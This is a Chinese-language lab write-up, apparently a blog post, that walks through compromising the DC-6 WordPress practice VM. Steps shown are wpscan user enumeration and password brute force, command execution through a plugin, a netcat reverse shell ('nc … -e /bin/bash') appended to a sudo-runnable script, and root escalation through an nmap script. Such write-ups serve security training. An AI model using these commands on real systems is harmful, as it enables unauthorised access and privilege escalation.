dc-6(wordpress)

靶机下载:dc-6

先找到靶机
image

你去访问192.168.6.132时发现定位不到
和dc-2问题一样
我们只需要在系统的hosts文件中加

192.168.6.132 wordy

image

我们尝试扫一下目录
image
找到了后台登陆系统
我们先找一下用户名

wpscan --url http://wordy -e u

image

把用户名搞到一个文件中然后再找一个字典
进行爆破

wpscan --url http://wordy -P 用户密码文件 -U 用户名文件

image

爆出一个用户的密码登陆进行测试

image

发现Activity monitor Tools中可以进行命令执行

image

直接反弹shell

image

经过一番探索我们发现了另一个用户的密码
登录查看

image

(jens) NOPASSWD: /home/jens/backups.sh:

(jens): 表示用户 graham 可以以用户 jens 的身份来执行命令。
NOPASSWD: 表示用户 graham 在执行此命令时不需要输入密码。
/home/jens/backups.sh: 这是具体的命令路径,表示用户 graham 可以在不输入密码的情况下,以用户 jens 的身份执行这个脚本文件 /home/jens/backups.sh。

我们可以在backups.sh
输入反弹shell的命令这样我们就可以拿到jens的shell

echo "nc 192.168.6.129 5555 -e /bin/bash" >> backups.sh
sudo -u jens ./backups.sh

image

接下来就是一个很简单的nmap提权
我们直接

echo 'os.execute("/bin/sh")' > TF
sudo nmap --script=TF

image

posted @ 2024-09-20 15:00  DGhh  阅读(45)  评论(0)    收藏  举报